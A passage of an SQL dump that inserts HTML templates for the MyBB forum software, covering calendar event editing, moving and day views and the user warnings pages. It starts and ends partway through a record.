value=\"{$end_time}\" size=\"7\" />\n </td>\n </tr>\n <tr>\n <td class=\"smalltext\" style=\"padding: 4px; text-align: right; vertical-align: top;\">{$lang->time_zone}</td>\n <td style=\"padding: 4px;\">\n {$timezones}<br />\n <label class=\"smalltext\" style=\"display: block; padding-top: 4px;\"><input type=\"checkbox\" name=\"ignoretimezone\" value=\"1\" {$ignore_timezone} style=\"vertical-align: middle;\" /> {$lang->ignore_timezone}</label>\n </td>\n </tr>\n <tr>\n <td class=\"smalltext\" style=\"padding: 4px; text-align: right; vertical-align:top;\">{$lang->repeats}</td>\n <td class=\"smalltext\" style=\"padding: 4px;\">\n <select name=\"repeats\" id=\"repeats\" onchange=\"toggleRepeats();\">\n <option value=\"0\">{$lang->does_not_repeat}</option>\n <option value=\"1\"{$repeats_sel[1]}>{$lang->repeats_daily}</option>\n <option value=\"2\"{$repeats_sel[2]}>{$lang->repeats_weekdays}</option>\n <option value=\"3\"{$repeats_sel[3]}>{$lang->repeats_weekly}</option>\n <option value=\"4\"{$repeats_sel[4]}>{$lang->repeats_monthly}</option>\n <option value=\"5\"{$repeats_sel[5]}>{$lang->repeats_yearly}</option>\n </select>\n <div class=\"repeats_type\" id=\"repeats_type_1\" style=\"padding: 4px;\">\n {$lang->repeats_every}\n <input type=\"text\" class=\"textbox\" name=\"repeats_1_days\" value=\"{$repeats_1_days}\" size=\"2\" /> {$lang->day_or_days}\n </div>\n <div class=\"repeats_type\" id=\"repeats_type_3\" style=\"padding: 4px;\">\n {$lang->repeats_every}\n <input type=\"text\" class=\"textbox\" name=\"repeats_3_weeks\" value=\"{$repeats_3_weeks}\" size=\"2\" /> {$lang->week_or_weeks_on}\n <br />\n <table style=\"padding: 4px;\">\n <tr>\n <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[0]\" value=\"1\" {$repeats_3_days[0]} style=\"vertical-align: middle;\" /> {$lang->sunday}</label></td>\n <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[1]\" value=\"1\" {$repeats_3_days[1]} style=\"vertical-align: middle;\" /> {$lang->monday}</label></td>\n <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[2]\" value=\"1\" {$repeats_3_days[2]} style=\"vertical-align: middle;\" /> {$lang->tuesday}</label></td>\n <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[3]\" value=\"1\" {$repeats_3_days[3]} style=\"vertical-align: middle;\" /> {$lang->wednesday}</label></td>\n </tr>\n <tr>\n <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[4]\" value=\"1\" {$repeats_3_days[4]} style=\"vertical-align: middle;\" /> {$lang->thursday}</label></td>\n <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[5]\" value=\"1\" {$repeats_3_days[5]} style=\"vertical-align: middle;\" /> {$lang->friday}</label></td>\n <td style=\"padding: 2px;\" class=\"smalltext\" colspan=\"2\"><label><input type=\"checkbox\" name=\"repeats_3_days[6]\" value=\"1\" {$repeats_3_days[6]} style=\"vertical-align: middle;\" /> {$lang->saturday}</label></td>\n </tr>\n </table>\n </div>\n <div class=\"repeats_type\" id=\"repeats_type_4\" style=\"padding: 4px;\">\n <div class=\"smalltext\"><label>\n <input type=\"radio\" name=\"repeats_4_type\" id=\"repeats_4_type_1\" value=\"1\" style=\"vertical-align: middle;\" {$repeats_4_type[1]} />\n {$lang->repeats_on_day}</label>\n <input type=\"text\" class=\"textbox\" name=\"repeats_4_day\" value=\"{$repeats_4_day}\" onfocus=\"$(\'repeats_4_type_1\').checked=true;\" size=\"2\" /> {$lang->of_every} <input type=\"text\" class=\"textbox\" name=\"repeats_4_months\" value=\"{$repeats_4_months}\" size=\"2\" onfocus=\"$(\'repeats_4_type_1\').checked=true;\" /> {$lang->month_or_months}\n </div>\n <div class=\"smalltext\" style=\"margin-top: 5px;\"><label>\n <input type=\"radio\" name=\"repeats_4_type\" id=\"repeats_4_type_2\" value=\"2\" style=\"vertical-align: middle;\" {$repeats_4_type[2]} />\n {$lang->repeats_on_the}</label>\n <select name=\"repeats_4_occurance\" onfocus=\"$(\'repeats_4_type_2\').checked=true;\">\n <option value=\"1\"{$repeats_4_occurance[1]}>{$lang->first}</option>\n <option value=\"2\"{$repeats_4_occurance[2]}>{$lang->second}</option>\n <option value=\"3\"{$repeats_4_occurance[3]}>{$lang->third}</option>\n <option value=\"4\"{$repeats_4_occurance[4]}>{$lang->fourth}</option>\n <option value=\"last\"{$repeats_4_occurance[\'last\']}>{$lang->last}</option>\n </select>\n <select name=\"repeats_4_weekday\" onfocus=\"$(\'repeats_4_type_2\').checked=true;\">\n <option value=\"0\"{$repeats_4_weekday[0]}>{$lang->sunday}</option>\n <option value=\"1\"{$repeats_4_weekday[1]}>{$lang->monday}</option>\n <option value=\"2\"{$repeats_4_weekday[2]}>{$lang->tuesday}</option>\n <option value=\"3\"{$repeats_4_weekday[3]}>{$lang->wednesday}</option>\n <option value=\"4\"{$repeats_4_weekday[4]}>{$lang->thursday}</option>\n <option value=\"5\"{$repeats_4_weekday[5]}>{$lang->friday}</option>\n <option value=\"6\"{$repeats_4_weekday[6]}>{$lang->saturday}</option>\n </select>\n {$lang->of_every}\n <input type=\"text\" class=\"textbox\" name=\"repeats_4_months2\" value=\"{$repeats_4_months2}\" size=\"2\" onfocus=\"$(\'repeats_4_type_2\').checked=true;\" /> {$lang->month_or_months}\n </div>\n </div>\n <div class=\"repeats_type\" id=\"repeats_type_5\" style=\"padding: 4px;\">\n <div class=\"smalltext\"><label>\n <input type=\"radio\" name=\"repeats_5_type\" value=\"1\" id=\"repeats_5_type_1\" style=\"vertical-align: middle;\" {$repeats_5_type[1]} />\n {$lang->repeats_on}</label>\n <input type=\"text\" class=\"textbox\" name=\"repeats_5_day\" onfocus=\"$(\'repeats_5_type_1\').checked=true;\" value=\"{$repeats_5_day}\" size=\"2\" />\n <select name=\"repeats_5_month\" onfocus=\"$(\'repeats_5_type_1\').checked=true;\" >\n <option value=\"1\"{$repeats_5_month[\'1\']}>{$lang->month_1}</option>\n <option value=\"2\"{$repeats_5_month[\'2\']}>{$lang->month_2}</option>\n <option value=\"3\"{$repeats_5_month[\'3\']}>{$lang->month_3}</option>\n <option value=\"4\"{$repeats_5_month[\'4\']}>{$lang->month_4}</option>\n <option value=\"5\"{$repeats_5_month[\'5\']}>{$lang->month_5}</option>\n <option value=\"6\"{$repeats_5_month[\'6\']}>{$lang->month_6}</option>\n <option value=\"7\"{$repeats_5_month[\'7\']}>{$lang->month_7}</option>\n <option value=\"8\"{$repeats_5_month[\'8\']}>{$lang->month_8}</option>\n <option value=\"9\"{$repeats_5_month[\'9\']}>{$lang->month_9}</option>\n <option value=\"10\"{$repeats_5_month[\'10\']}>{$lang->month_10}</option>\n <option value=\"11\"{$repeats_5_month[\'11\']}>{$lang->month_11}</option>\n <option value=\"12\"{$repeats_5_month[\'12\']}>{$lang->month_12}</option>\n </select>\n {$lang->every}\n <input type=\"text\" class=\"textbox\" name=\"repeats_5_years\" value=\"{$repeats_5_years}\" onfocus=\"$(\'repeats_5_type_1\').checked=true;\" size=\"2\" /> {$lang->year_or_years}\n </div>\n <div class=\"smalltext\" style=\"margin-top: 5px;\"><label>\n <input type=\"radio\" name=\"repeats_5_type\" value=\"2\" id=\"repeats_5_type_2\" style=\"vertical-align: middle;\" {$repeats_5_type[2]} />\n {$lang->repeats_on_the}</label>\n <select name=\"repeats_5_occurance\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" >\n <option value=\"1\"{$repeats_5_occurance[1]}>{$lang->first}</option>\n <option value=\"2\"{$repeats_5_occurance[2]}>{$lang->second}</option>\n <option value=\"3\"{$repeats_5_occurance[3]}>{$lang->third}</option>\n <option value=\"4\"{$repeats_5_occurance[4]}>{$lang->fourth}</option>\n <option value=\"last\"{$repeats_4_occurance[\'last\']}>{$lang->last}</option>\n </select>\n <select name=\"repeats_5_weekday\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" >\n <option value=\"0\"{$repeats_5_weekday[0]}>{$lang->sunday}</option>\n <option value=\"1\"{$repeats_5_weekday[1]}>{$lang->monday}</option>\n <option value=\"2\"{$repeats_5_weekday[2]}>{$lang->tuesday}</option>\n <option value=\"3\"{$repeats_5_weekday[3]}>{$lang->wednesday}</option>\n <option value=\"4\"{$repeats_5_weekday[4]}>{$lang->thursday}</option>\n <option value=\"5\"{$repeats_5_weekday[5]}>{$lang->friday}</option>\n <option value=\"6\"{$repeats_5_weekday[6]}>{$lang->saturday}</option>\n </select>\n {$lang->of}\n <select name=\"repeats_5_month2\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" >\n <option value=\"1\"{$repeats_5_month2[\'1\']}>{$lang->month_1}</option>\n <option value=\"2\"{$repeats_5_month2[\'2\']}>{$lang->month_2}</option>\n <option value=\"3\"{$repeats_5_month2[\'3\']}>{$lang->month_3}</option>\n <option value=\"4\"{$repeats_5_month2[\'4\']}>{$lang->month_4}</option>\n <option value=\"5\"{$repeats_5_month2[\'5\']}>{$lang->month_5}</option>\n <option value=\"6\"{$repeats_5_month2[\'6\']}>{$lang->month_6}</option>\n <option value=\"7\"{$repeats_5_month2[\'7\']}>{$lang->month_7}</option>\n <option value=\"8\"{$repeats_5_month2[\'8\']}>{$lang->month_8}</option>\n <option value=\"9\"{$repeats_5_month2[\'9\']}>{$lang->month_9}</option>\n <option value=\"10\"{$repeats_5_month2[\'10\']}>{$lang->month_10}</option>\n <option value=\"11\"{$repeats_5_month2[\'11\']}>{$lang->month_11}</option>\n <option value=\"12\"{$repeats_5_month2[\'12\']}>{$lang->month_12}</option>\n </select>\n {$lang->every}\n <input type=\"text\" class=\"textbox\" name=\"repeats_5_years2\" value=\"{$repeats_5_years}\" size=\"2\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" /> {$lang->year_or_years}\n </div>\n </div>\n </td>\n </tr>\n </table>\n </dd>\n </dl>\n <script type=\"text/javascript\">\n <!--\n toggleType();\n toggleRepeats();\n // -->\n </script>\n </td>\n </tr>\n <tr>\n <td valign=\"top\" width=\"20%\" class=\"trow1\"><strong>{$lang->event_details}</strong>{$smilieinserter}</td>\n <td class=\"trow1\"><textarea name=\"description\" id=\"message\" rows=\"20\" cols=\"70\">{$description}</textarea>\n {$codebuttons}</td>\n </tr>\n <tr>\n <td width=\"20%\" class=\"trow2\"><strong>{$lang->event_options}</strong></td>\n <td class=\"trow2\">\n <input type=\"checkbox\" class=\"checkbox\" name=\"private\" value=\"1\"{$privatecheck} /><span class=\"smalltext\">{$lang->private_option}</span><br />\n </td>\n </tr>\n </table>\n <br />\n <input type=\"hidden\" name=\"action\" value=\"do_editevent\" />\n <input type=\"hidden\" name=\"eid\" value=\"{$event[\'eid\']}\" />\n <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->edit_event}\" /></div>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1402', '', '1339729416'); INSERT INTO mybb_templates VALUES('488', 'calendar_move', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->calendar} - {$lang->move_event}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"calendar.php\" method=\"post\" name=\"input\">\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\">\n <tr>\n <td colspan=\"2\" width=\"100%\" class=\"thead\"><strong>{$lang->move_event}: {$event[\'name\']}</strong></td>\n </tr>\n <tr>\n <td width=\"20%\" class=\"trow1\"><strong>{$lang->move_to_calendar}:</strong></td>\n <td class=\"trow1\">\n <select name=\"new_calendar\">\n {$calendar_select}\n </select>\n </td>\n </tr>\n </table>\n <br />\n <input type=\"hidden\" name=\"action\" value=\"do_move\" />\n <input type=\"hidden\" name=\"eid\" value=\"{$event[\'eid\']}\" />\n <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->move_event}\" /></div>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1402', '', '1339729416'); INSERT INTO mybb_templates VALUES('489', 'calendar_event', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->calendar} - {$event[\'name\']}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\"><strong>{$event[\'name\']}</strong></td>\n </tr>\n <tr>\n <td class=\"tcat\"><strong>{$time_period}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1{$event_class}\">\n <div style=\"float: left;\">\n <strong><span class=\"largetext\">{$event[\'profilelink\']}</span></strong><br />\n <span class=\"smalltext\">\n {$event[\'usertitle\']}<br />\n {$event[\'userstars\']}\n </span>\n </div>\n <div style=\"float: right; text-align: right;\">\n {$moderator_options}\n {$repeats}\n </div>\n <br style=\"clear: both;\" />\n </td>\n </tr>\n <tr>\n <td class=\"trow2{$event_class}\">\n <p>{$event[\'description\']}</p>\n {$edit_event}\n </td>\n </tr>\n</table>\n<br />\n<form action=\"calendar.php\" method=\"post\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"trow1\">\n <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n <tr>\n <td class=\"trow1\" valign=\"top\">{$addevent}</td>\n <td class=\"trow1\" align=\"right\">\n <span class=\"smalltext\"><strong>{$lang->jump_month}</strong></span>\n <select name=\"month\">\n <option value=\"{$month}\">{$monthnames[$month]}</option>\n <option value=\"{$week_from[1]}\">----------</option>\n <option value=\"1\">{$lang->alt_month_1}</option>\n <option value=\"2\">{$lang->alt_month_2}</option>\n <option value=\"3\">{$lang->alt_month_3}</option>\n <option value=\"4\">{$lang->alt_month_4}</option>\n <option value=\"5\">{$lang->alt_month_5}</option>\n <option value=\"6\">{$lang->alt_month_6}</option>\n <option value=\"7\">{$lang->alt_month_7}</option>\n <option value=\"8\">{$lang->alt_month_8}</option>\n <option value=\"9\">{$lang->alt_month_9}</option>\n <option value=\"10\">{$lang->alt_month_10}</option>\n <option value=\"11\">{$lang->alt_month_11}</option>\n <option value=\"12\">{$lang->alt_month_12}</option>\n </select>\n <select name=\"year\">\n {$yearsel}\n </select>\n {$gobutton}\n <br /><br />\n <span class=\"smalltext\"><strong>{$lang->jump_to_calendar}</strong></span>\n {$calendar_jump}\n {$gobutton}\n </td>\n </tr>\n </table>\n </td>\n </tr>\n </table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('490', 'calendar_event_modoptions', ' <form method=\"post\" action=\"calendar.php\">\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <input type=\"hidden\" name=\"eid\" value=\"{$event[\'eid\']}\">\n <select name=\"action\" onchange=\"if(this.options[this.selectedIndex].value != \'\') { window.location=(\'calendar.php?action=\'+this.options[this.selectedIndex].value+\'&amp;eid={$event[\'eid\']}&amp;my_post_key={$mybb->post_code}\') }\">\n <option value=\"\" style=\"font-weight: bold;\">{$lang->moderator_options}</option>\n <option value=\"{$approve_value}\">{$approve}</option>\n <option value=\"move\">{$lang->move_event}</option>\n </select>\n {$gobutton}\n </form>\n <br />', '-2', '1604', '', '1339729416'); INSERT INTO mybb_templates VALUES('491', 'calendar_dayview', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->calendar}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$birthdays}\n{$events}\n<br />\n<form action=\"calendar.php\" method=\"post\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"trow1\">\n <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n <tr>\n <td class=\"trow1\" valign=\"top\">{$addevent}</td>\n <td class=\"trow1\" align=\"right\">\n <span class=\"smalltext\"><strong>{$lang->jump_month}</strong></span>\n <select name=\"month\">\n <option value=\"{$month}\">{$monthnames[$month]}</option>\n <option value=\"{$month}\">----------</option>\n <option value=\"1\">{$lang->alt_month_1}</option>\n <option value=\"2\">{$lang->alt_month_2}</option>\n <option value=\"3\">{$lang->alt_month_3}</option>\n <option value=\"4\">{$lang->alt_month_4}</option>\n <option value=\"5\">{$lang->alt_month_5}</option>\n <option value=\"6\">{$lang->alt_month_6}</option>\n <option value=\"7\">{$lang->alt_month_7}</option>\n <option value=\"8\">{$lang->alt_month_8}</option>\n <option value=\"9\">{$lang->alt_month_9}</option>\n <option value=\"10\">{$lang->alt_month_10}</option>\n <option value=\"11\">{$lang->alt_month_11}</option>\n <option value=\"12\">{$lang->alt_month_12}</option>\n </select>\n <select name=\"year\">\n <option value=\"{$year}\">{$year}</option>\n <option value=\"{$year}\">----------</option>\n {$yearsel}\n </select>\n {$gobutton}\n <br /><br />\n <span class=\"smalltext\"><strong>{$lang->jump_to_calendar}</strong></span>\n {$calendar_jump}\n {$gobutton}\n </td>\n </tr>\n </table>\n </td>\n </tr>\n </table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1405', '', '1339729416'); INSERT INTO mybb_templates VALUES('492', 'calendar_dayview_event', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\"><strong>{$event[\'name\']}</strong></td>\n </tr>\n <tr>\n <td class=\"tcat\"><strong>{$time_period}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1{$event_class}\">\n <div style=\"float: left;\">\n <strong><span class=\"largetext\">{$event[\'profilelink\']}</span></strong><br />\n <span class=\"smalltext\">\n {$event[\'usertitle\']}<br />\n {$event[\'userstars\']}\n </span>\n </div>\n <div style=\"float: right; text-align: right;\">\n {$moderator_options}\n {$repeats}\n </div>\n <br style=\"clear: both;\" />\n </td>\n </tr>\n <tr>\n <td class=\"trow2{$event_class}\">\n <p>{$event[\'description\']}</p>\n {$edit_event}\n </td>\n </tr>\n</table>\n<br />\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('493', 'calendar_event_editbutton', '<div style=\"text-align: right; vertical-align: bottom;\">\n <a href=\"calendar.php?action=editevent&amp;eid={$event[\'eid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_edit.gif\" border=\"0\" alt=\"{$lang->alt_edit}\" title=\"{$lang->alt_edit}\" /></a>\n <a href=\"javascript:MyBB.deleteEvent({$event[\'eid\']});\"><img src=\"{$theme[\'imglangdir\']}/postbit_delete.gif\" border=\"0\" alt=\"{$lang->alt_delete}\" title=\"{$lang->alt_delete}\" /></a>\n</div>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('494', 'calendar_dayview_birthdays', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->birthdays_on_day}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\"><span class=\"smalltext\">{$birthday_list}</span></td>\n</tr>\n</table>\n<br />\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('495', 'calendar_dayview_birthdays_bday', '{$comma}{$birthday[\'profilelink\']}{$age}', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('496', 'warnings', '<html>\n<head>\n <title>{$mybb->settings[\'bbname\']} - {$lang->warning_log}</title>\n {$headerinclude}\n</head>\n<body>\n {$header}\n\n {$multipage}\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <thead>\n <tr>\n <td class=\"thead\" colspan=\"5\">\n <div class=\"float_right\">{$lang->current_warning_level}</div>\n <div><strong>{$lang->warning_log}</strong></div>\n </td>\n </tr>\n <tr>\n <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->warning}</strong></span></td>\n <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->date_issued}</strong></span></td>\n <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->expiry_date}</strong></span></td>\n <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->issued_by}</strong></span></td>\n <td class=\"tcat\" width=\"1\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->details}</strong></span></td>\n </tr>\n </thead>\n <tbody>\n {$warnings}\n </tbody>\n </table>\n {$multipage}\n\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('497', 'warnings_warning', ' <tr>\n <td class=\"{$alt_bg}\">{$warning_type} {$points}{$post_link}</td>\n <td class=\"{$alt_bg}\" align=\"center\">{$date_issued}</td>\n <td class=\"{$alt_bg}\" align=\"center\">{$expires}</td>\n <td class=\"{$alt_bg}\" align=\"center\">{$issuedby}</td>\n <td class=\"{$alt_bg}\" align=\"center\"><a href=\"warnings.php?action=view&amp;wid={$warning[\'wid\']}\">{$lang->view}</a></td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('498', 'warnings_active_header', ' <tr>\n <td class=\"trow_sep\" colspan=\"5\">{$lang->active_warnings}</td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('499', 'warnings_expired_header', ' <tr>\n <td class=\"trow_sep\" colspan=\"5\">{$lang->expired_warnings}</td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('500', 'warnings_no_warnings', ' <tr>\n <td class=\"trow1\" colspan=\"5\" align=\"center\">{$lang->no_warnings}</td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('501', 'warnings_warn_existing', ' <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <thead>\n <tr>\n <td class=\"thead\" colspan=\"5\">\n <div><strong>{$lang->existing_post_warnings}</strong></div>\n </td>\n </tr>\n <tr>\n <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->warning}</strong></span></td>\n <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->date_issued}</strong></span></td>\n <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->expiry_date}</strong></span></td>\n <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->issued_by}</strong></span></td>\n <td class=\"tcat\" width=\"1\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->details}</strong></span></td>\n </tr>\n </thead>\n <tbody>\n {$warnings}\n </tbody>\n </table><br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('502', 'warnings_warn', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->warn_user}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$existing_warnings}\n{$warn_errors}\n<form action=\"warnings.php\" method=\"post\" name=\"input\">\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <input type=\"hidden\" name=\"action\" value=\"do_warn\" />\n <input type=\"hidden\" name=\"uid\" value=\"{$user[\'uid\']}\" />\n\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\">\n <tr>\n <td colspan=\"2\" width=\"100%\" class=\"thead\"><strong>{$lang->warn_user}</strong></td>\n </tr>\n <tr>\n <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->warn_user_desc}</strong></span></td>\n </tr>\n <tr>\n <td width=\"20%\" class=\"trow1\"><strong>{$lang->username}</strong></td>\n <td class=\"trow1\">{$user_link}</td>\n </tr>\n{$post}\n <tr>\n <td width=\"20%\" class=\"trow1\" valign=\"top\"><strong>{$lang->warning_note}</strong></td>\n <td class=\"trow1\"><textarea name=\"notes\" cols=\"60\" rows=\"4\">{$notes}</textarea></td>\n </tr>\n <tr>\n <td width=\"20%\" class=\"trow2\" valign=\"top\"><strong>{$lang->warning_type}</strong></td>\n <td class=\"trow2\">\n <script type=\"text/javascript\">\n // <!--\n function checkType()\n {\n var checked = \'\';\n $$(\'.types_check\').each(function(e)\n {\n if(e.checked == true)\n {\n checked = e.value;\n }\n });\n $$(\'.types\').each(function(e)\n {\n Element.hide(e);\n });\n if($(\'type_\'+checked))\n {\n Element.show(\'type_\'+checked);\n }\n }\n // -->\n </script>\n <dl style=\"margin-top: 0; margin-bottom: 0; width: 100%;\">\n {$types}\n {$custom_warning}\n </dl>\n <script type=\"text/javascript\">\n // <!--\n checkType();\n // -->\n </script>\n </td>\n </tr>\n {$pm_notify}\n </table>\n <br />\n <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->warn_user}\" /></div>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('503', 'warnings_warn_type', ' <dt><label style=\"display: block;\"><input type=\"radio\" name=\"type\" value=\"{$type[\'tid\']}\" {$checked} class=\"types_check\" onclick=\"checkType();\" style=\"vertical-align: middle;\" /> <strong>{$type[\'title\']}</strong> {$points}</label></dt>\n <dd style=\"margin-top: 4px;\" id=\"type_{$type[\'tid\']}\" class=\"types\">\n <div class=\"smalltext\">{$lang->new_warning_level}</div>\n <div class=\"tborder\" style=\"width: 150px; float: left; margin: 0; padding: 1px;\">\n <div class=\"trow1\" style=\"width: {$current_level}%; float: left; \">&nbsp;</div>\n <div class=\"trow2\" style=\"width: {$level_diff}%; float: left;\">&nbsp;</div>\n </div>\n <div style=\"padding-left: 10px; font-weight: bold; float: left;\">{$new_warning_level}%</div><br style=\"clear: left;\" />\n {$result}\n </dd>', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('504', 'warnings_warn_custom', ' <dt><label style=\"display: block;\"><input type=\"radio\" name=\"type\" value=\"custom\" {$type_checked[\'custom\']} class=\"types_check\" onclick=\"checkType();\" style=\"vertical-align: middle;\" /> <strong>{$lang->custom}</strong></label></dt>\n <dd style=\"margin-top: 4px;\" id=\"type_custom\" class=\"types\">\n <table>\n <tr>\n <td class=\"smalltext\">{$lang->reason}</td>\n <td class=\"smalltext\">{$lang->points}</td>\n </tr>\n <tr>\n <td><input type=\"text\" class=\"textbox\" name=\"custom_reason\" size=\"50\" maxlength=\"120\" value=\"{$custom_reason}\" /></td>\n <td><input type=\"text\" class=\"textbox\" name=\"custom_points\" size=\"2\" value=\"{$custom_points}\" /></td>\n </tr>\n <tr>\n <td class=\"smalltext\" colspan=\"2\" style=\"padding-top: 4px;\">{$lang->expires}</td>\n </tr>\n <tr>\n <td colspan=\"2\">\n <input type=\"text\" class=\"textbox\" name=\"expires\" size=\"2\" value=\"{$expires}\" />\n <select name=\"expires_period\">\n <option value=\"hours\" {$expires_period[\'hours\']}>{$lang->hour_or_hours}</option>\n <option value=\"days\" {$expires_period[\'days\']}>{$lang->day_or_days}</option>\n <option value=\"weeks\" {$expires_period[\'weeks\']}>{$lang->week_or_weeks}</option>\n <option value=\"months\" {$expires_period[\'months\']}>{$lang->month_or_months}</option>\n <option value=\"never\" {$expires_period[\'never\']}>{$lang->never}</option>\n </select>\n </td>\n </tr>\n </table>\n </dd>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('505', 'warnings_warn_pm', ' <tr>\n <td width=\"20%\" class=\"trow1\" valign=\"top\">\n <strong>{$lang->send_pm}</strong>\n <div style=\"margin:auto\" id=\"pm_smilie_insert\">{$smilieinserter}</div>\n </td>\n <td class=\"trow1\">\n <script type=\"text/javascript\">\n // <!--\n var mybb_editor_disabled = true;\n var clickableEditor = \'\';\n function togglePM()\n {\n if($(\'send_pm\').checked == true)\n {\n $(\'pm_input\').show();\n $(\'pm_smilie_insert\').show();\n if(mybb_editor_disabled == true && editor_language)\n {\n mybb_editor_disabled = false;\n clickableEditor = new messageEditor(\"message\", {lang: editor_language, rtl: {$lang->settings[\'rtl\']}, theme: \"{$theme[\'editortheme\']}\"});\n if(clickableEditor)\n {\n clickableEditor.bindSmilieInserter(\"clickable_smilies\");\n }\n }\n }\n else\n {\n $(\'pm_input\').hide();\n $(\'pm_smilie_insert\').hide();\n }\n }\n // -->\n </script>\n <label style=\"display: block;\"><input type=\"checkbox\" class=\"checkbox\" value=\"1\" name=\"send_pm\" id=\"send_pm\" onclick=\"togglePM();\" style=\"vertical-align: middle;\" {$send_pm_checked} /> {$lang->send_user_warning_pm}</label>\n <table id=\"pm_input\" cellpadding=\"{$theme[\'tablespace\']}\">\n <tr>\n <td><strong>{$lang->send_pm_subject}</strong></td>\n <td><input type=\"text\" class=\"textbox\" name=\"pm_subject\" size=\"40\" maxlength=\"85\" value=\"{$pm_subject}\" /></td>\n </tr>\n <tr>\n <td valign=\"top\"><strong>{$lang->send_pm_message}</strong></td>\n <td><textarea name=\"pm_message\" id=\"message\" rows=\"20\" cols=\"70\">{$message}</textarea>\n {$codebuttons}</td>\n </tr>\n </table>\n <script type=\"text/javascript\">\n <!--\n togglePM();\n // -->\n </script>\n </td>\n 